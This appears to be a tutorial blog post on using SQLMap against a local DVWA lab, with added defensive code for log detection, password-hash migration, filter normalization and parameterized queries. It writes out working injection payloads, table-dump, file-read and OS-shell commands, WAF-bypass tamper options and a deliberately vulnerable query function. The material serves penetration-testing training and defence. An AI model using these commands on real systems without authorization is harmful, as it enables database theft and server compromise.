SQL injection remains one of the most prevalent vulnerabilities in web applications, consistently sitting on the OWASP Top 10. SQLMap is the industry-standard open-source tool for detecting and exploiting SQL injection flaws automatically. It handles everything from fingerprinting the database engine to dumping tables, extracting password hashes, and even spawning an OS-level shell — all with a single command line.
This guide covers SQLMap from first scan through full database compromise, using DVWA (Damn Vulnerable Web Application) as the practice target.
Ethical reminder: Use SQLMap only on applications you own or have written authorization to test. Unauthorized testing violates computer fraud laws worldwide.
Installation and Requirements
SQLMap is pre-installed on Kali Linux and Parrot OS. Verify the version:
```shell
sqlmap --version
# 1.8.6#stable
```
Install on any system with Python 3:
```shell
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python3 sqlmap.py --version
```
Setting Up a Practice Target
The safest way to practice is against DVWA running in Docker:
```shell
docker run -d -p 8080:80 vulnerables/web-dvwa
```
Navigate to http://localhost:8080, log in with admin / password, and set the security level to Low in the DVWA Security tab. The SQL Injection page at /dvwa/vulnerabilities/sqli/ is your target.
Basic Scanning
Testing a GET Parameter
The simplest SQLMap invocation tests a URL with a GET parameter. Grab the URL from your browser while testing the DVWA SQL injection page:
```shell
sqlmap -u "http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
  --cookie="PHPSESSID=abc123; security=low"
```
SQLMap will run a battery of payloads and report vulnerable parameters:
```text
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 5574=5574&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(...)-- -
```
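The three payload shapes in that output are also what the same attack looks like from the server side. The following is an added example (not part of the original post or of SQLMap) that runs the page's payload patterns as detection logic over a few constructed access-log lines in combined log format; the log lines, the `LOG_RE` parser and the `CHECKS` signatures are this example's own assumptions, not SQLMap output.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache/nginx combined format), not real
# traffic. Line 1 is a normal DVWA request; lines 2-4 carry the three payload
# shapes reported above, URL-encoded the way a web server records them.
SAMPLE_LOG = """\
127.0.0.1 - - [10/May/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
127.0.0.1 - - [10/May/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20AND%205574%3D5574&Submit=Submit HTTP/1.1" 200 4512 "-" "sqlmap/1.8.6#stable (https://sqlmap.org)"
127.0.0.1 - - [10/May/2024:10:00:08 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20AND%20SLEEP%285%29&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
127.0.0.1 - - [10/May/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%28...%29--%20-&Submit=Submit HTTP/1.1" 200 6100 "-" "Mozilla/5.0"
"""

# Pull the request target and the User-Agent out of a combined-format entry.
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures for the three payload families above. The boolean check uses a
# backreference so it only fires on a tautology (N=N), not on any "AND" that
# happens to appear in a search string.
CHECKS = [
    ("boolean-based", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("time-based", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("union", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]


def classify(line: str) -> list[str]:
    """Return the detection tags that apply to one access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    # Decode once so %20 / %3D become the characters the database would see.
    target = unquote_plus(m.group("target"))
    tags = [name for name, rx in CHECKS if rx.search(target)]
    # SQLMap's default User-Agent names itself; --random-agent hides that,
    # which is why the payload checks are the ones to rely on.
    if "sqlmap/" in m.group("ua").lower():
        tags.append("sqlmap-user-agent")
    return tags


def scan(log_text: str) -> list[tuple[int, list[str]]]:
    """Scan a whole log and return (line_number, tags) for every flagged line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        tags = classify(line)
        if tags:
            hits.append((n, tags))
    return hits


if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(tags)}")
```

The decode step matters: a signature written against the raw, percent-encoded log line would miss `%3D` for `=`. Time-based payloads are also visible as a cluster of requests whose response time tracks the `SLEEP` argument, which a latency-based check catches even when the payload text is obfuscated.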
Testing a POST Parameter
For login forms or search boxes that use POST requests, capture the request with Burp Suite, save it as a file, and pass it to SQLMap:
```shell
sqlmap -r /tmp/request.txt -p username
```
Where request.txt contains the raw HTTP request:
```http
POST /login HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded

username=admin&password=test&submit=Login
```

The blank line between the headers and the body is required; without it SQLMap cannot tell where the POST data begins.
Enumerating the Database
Once a vulnerability is confirmed, enumerate the database structure step by step.
List Databases
```shell
sqlmap -u "http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
  --cookie="PHPSESSID=abc123; security=low" --dbs
```
Output:
```text
available databases [2]:
[*] dvwa
[*] information_schema
```
List Tables in a Database
```shell
sqlmap -u "..." --cookie="..." -D dvwa --tables
```

```text
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
```
Dump a Table
```shell
sqlmap -u "..." --cookie="..." -D dvwa -T users --dump
```
SQLMap will extract all columns and rows, automatically recognizing and attempting to crack any password hashes it finds:
```text
+----+---------+----------------------------------+
| id | user    | password                         |
+----+---------+----------------------------------+
| 1  | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2  | gordonb | e99a18c428cb38d5f260853678922e03 |
+----+---------+----------------------------------+
```
It will offer to crack hashes using a dictionary attack on the spot.
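Why the on-the-spot crack succeeds is worth seeing in code. The following is an added example (not from the original post, not SQLMap code) that audits the two dumped hashes against a small constructed wordlist, then shows the storage format that would have survived the dump: a per-user random salt and PBKDF2-HMAC-SHA256. `DUMPED` holds the two hashes from the table above; `WORDLIST`, the `pbkdf2_sha256$...` record layout and the function names are this example's own choices.

```python
import hashlib
import hmac
import os

# The two hashes from the dump above (DVWA's sample accounts): unsalted MD5.
DUMPED = {
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
}

# Constructed mini wordlist standing in for the dictionary SQLMap offers to use.
WORDLIST = ["letmein", "password", "qwerty", "abc123", "welcome1"]


def audit_unsalted_md5(hashes: dict[str, str], wordlist: list[str]) -> dict[str, str]:
    """Return {user: word} for every stored hash equal to MD5 of a wordlist entry.

    One MD5 per word covers every user at once: with no salt, identical
    passwords share a hash and a precomputed table works forever. That is the
    weakness the audit is flagging.
    """
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup[h] for user, h in hashes.items() if h in lookup}


PBKDF2_ITERATIONS = 600_000  # OWASP's current floor for PBKDF2-HMAC-SHA256


def hash_password(password: str, salt: bytes = b"") -> str:
    """Store as 'pbkdf2_sha256$iterations$salt_hex$digest_hex' with a random salt."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("weak hashes recovered:", audit_unsalted_md5(DUMPED, WORDLIST))
    record = hash_password("password")
    print("migrated record:", record)
    print("verifies:", verify_password("password", record))
```

Two properties of the migrated record are the point: the same password hashes differently for every user (random salt), and each guess costs 600,000 HMAC iterations instead of one MD5, so a dumped table no longer cracks "on the spot". In a real codebase use the platform's password hasher (bcrypt, scrypt or Argon2 libraries) rather than hand-rolling this, but the shape is the same.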
Advanced SQLMap Techniques
Specifying the DBMS
If you already know the database engine (speeds up scanning dramatically):
```shell
sqlmap -u "..." --dbms=mysql
```
Common options: mysql, mssql, oracle, postgresql, sqlite
Tamper Scripts
Web application firewalls (WAFs) and filters can block standard payloads. SQLMap’s tamper scripts obfuscate payloads to bypass common defenses:
```shell
sqlmap -u "..." --tamper=space2comment,between,randomcase
```

| Tamper Script | What It Does |
|---|---|
| `space2comment` | Replaces spaces with `/**/` |
| `between` | Replaces `>` with `NOT BETWEEN 0 AND` |
| `randomcase` | Randomizes payload letter case |
| `charencode` | URL-encodes characters |
| `base64encode` | Base64-encodes the entire payload |
| `apostrophemask` | Replaces apostrophes with UTF-8 full-width equivalents |
Stack multiple tampers with commas. For heavy WAF bypass, combine charencode, randomcase, and space2comment together.
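The flip side of tamper scripts is what they teach about filter design: a signature that matches the literal string of a payload misses every rewritten form of it. The following is an added example (not part of the original post or of SQLMap) with constructed inputs showing the same boolean payload after the kinds of rewriting `space2comment`, `randomcase` and `charencode` perform, and a `normalize` step (repeated percent-decoding, comment stripping, case folding) that lets one signature match all of them. The sample strings, `RAW_SIGNATURE` and `NORMALIZED_SIGNATURE` are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed payloads: one plain form and the same logic after the kinds of
# rewriting the tamper scripts above perform, plus a benign value. Not SQLMap output.
SAMPLES = {
    "plain": "1 AND 5574=5574",
    "space2comment": "1/**/AND/**/5574=5574",
    "randomcase": "1 aNd 5574=5574",
    "charencode": "1%20AND%205574%3D5574",
    "stacked": "1%2F%2A%2A%2FaNd%2F%2A%2A%2F5574%3D5574",
    "benign": "1",
}

# A naive, literal signature of the kind a simple filter might use.
RAW_SIGNATURE = re.compile(r" AND \d+=\d+")

# The same logic matched after normalization; the backreference demands a
# genuine tautology (N=N).
NORMALIZED_SIGNATURE = re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b")


def normalize(value: str, max_rounds: int = 3) -> str:
    """Canonicalize a parameter value before signature matching.

    Percent-decodes until stable (catches double encoding), turns inline
    comments into whitespace (undoes space2comment), collapses whitespace runs
    and upper-cases (undoes randomcase).
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value)
    value = re.sub(r"\s+", " ", value).strip()
    return value.upper()


def raw_match(value: str) -> bool:
    """Literal signature applied to the value as received."""
    return RAW_SIGNATURE.search(value) is not None


def normalized_match(value: str) -> bool:
    """Signature applied after canonicalization."""
    return NORMALIZED_SIGNATURE.search(normalize(value)) is not None


def evaluate(samples: dict[str, str]) -> dict[str, tuple[bool, bool]]:
    """Map each sample name to (raw signature hit, normalized signature hit)."""
    return {name: (raw_match(v), normalized_match(v)) for name, v in samples.items()}


if __name__ == "__main__":
    for name, (raw, norm) in evaluate(SAMPLES).items():
        print(f"{name:14s} raw={str(raw):5s} normalized={norm}")
```

Only the plain form trips the literal signature; every rewritten form trips the normalized one. Note the limit: `between` changes the SQL itself (`=` into a `BETWEEN` range), so no amount of string canonicalization restores the original text. Signature matching is a detection aid and a speed bump; the fix that removes the bug is the parameterized query recommended at the end of this guide.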
Setting the Risk and Level
By default SQLMap uses --level=1 --risk=1 (safe, conservative). Increase these on confirmed-vulnerable targets:
```shell
sqlmap -u "..." --level=5 --risk=3
```
- Level 1–5: How many test payloads to try (headers, cookies, etc.)
- Risk 1–3: How aggressive to be (risk=3 includes heavy time-based payloads that can crash DBs)
Threading
Speed up large scans with threading (default is 1):
```shell
sqlmap -u "..." --threads=10
```
Operating System Interaction
On misconfigured MySQL servers with FILE privileges, SQLMap can read files:
```shell
sqlmap -u "..." --file-read="/etc/passwd"
```
On MSSQL with xp_cmdshell enabled, or MySQL with INTO OUTFILE access, SQLMap can attempt to write files or execute OS commands:
```shell
sqlmap -u "..." --os-shell
```
This drops into an interactive shell on the database server — a critical finding to include in any pentest report.
Saving and Resuming Sessions
For long-running tests, SQLMap automatically saves its session. Re-running the same command resumes where the previous scan stopped, because SQLMap reloads the stored session from its output directory. To load a specific saved session file (path below is a placeholder):

```shell
sqlmap -u "..." -s /path/to/session.sqlite
```

Or specify a custom output directory, where the session files are kept:

```shell
sqlmap -u "..." --output-dir=/tmp/sqlmap-sessions
```
Practical Flags Reference
| Flag | Purpose |
|---|---|
| `-u URL` | Target URL |
| `-r FILE` | Load raw HTTP request from file |
| `-p PARAM` | Test specific parameter |
| `--dbs` | Enumerate databases |
| `-D DB --tables` | List tables in database |
| `-D DB -T TABLE --dump` | Dump table contents |
| `--batch` | Non-interactive mode (auto-answer prompts) |
| `--forms` | Auto-detect and test HTML forms |
| `--crawl=DEPTH` | Spider the app before testing |
| `--proxy=http://127.0.0.1:8080` | Route through Burp Suite |
| `--tor` | Route through Tor network |
| `--random-agent` | Randomize User-Agent header |
| `--flush-session` | Clear cached session data |
Reporting Findings
When writing up SQL injection findings, document:
- Vulnerable parameter and URL
- Injection type (Union-based, blind boolean, time-based, error-based)
- Database engine and version (SQLMap reports this automatically)
- Data accessed (list tables/records exposed — do NOT dump real PII in a report)
- Potential impact (data exfiltration, authentication bypass, OS command execution)
- Recommended fix (parameterized queries / prepared statements)
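To make the recommended fix concrete, here is an added example (not from the original post, and not DVWA's PHP) that reproduces the DVWA low-security pattern and its parameterized replacement against an in-memory SQLite stand-in for the `users` table dumped earlier. The page's own payload `1 AND 5574=5574` is used as input; the SQLite schema and the `lookup_*` function names are this example's assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for DVWA's users table with the two rows dumped above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
            (2, "gordonb", "e99a18c428cb38d5f260853678922e03"),
        ],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list[str]:
    """What the low-security page effectively does: the raw parameter is spliced
    into the SQL text, so whatever it contains becomes part of the query logic.
    Deliberately vulnerable; kept only to contrast with lookup_safe."""
    sql = f"SELECT user FROM users WHERE id = {user_id}"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list[str]:
    """Parameterized form: the value is bound as data and never parsed as SQL.
    For an integer id, validating with int(user_id) before binding is a
    sensible extra check, but binding alone already removes the injection."""
    rows = conn.execute("SELECT user FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for value in ["1", "1 AND 5574=5574", "1 AND 5574=5575"]:
        print(f"{value!r:22s} vulnerable={lookup_vulnerable(db, value)} safe={lookup_safe(db, value)}")
```

Run it and the boolean-based blind oracle is visible in the vulnerable path: a true tautology returns the admin row, a false one returns nothing, and that difference is all SQLMap needs. The parameterized path returns the row only for a genuine id and an empty result for both crafted values, because the whole string is compared against the `id` column as a value rather than interpreted.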
SQLMap is an indispensable tool for web application assessments, but it’s only as good as the tester interpreting its output. Understanding why an injection works helps you write better reports and give more actionable remediation advice.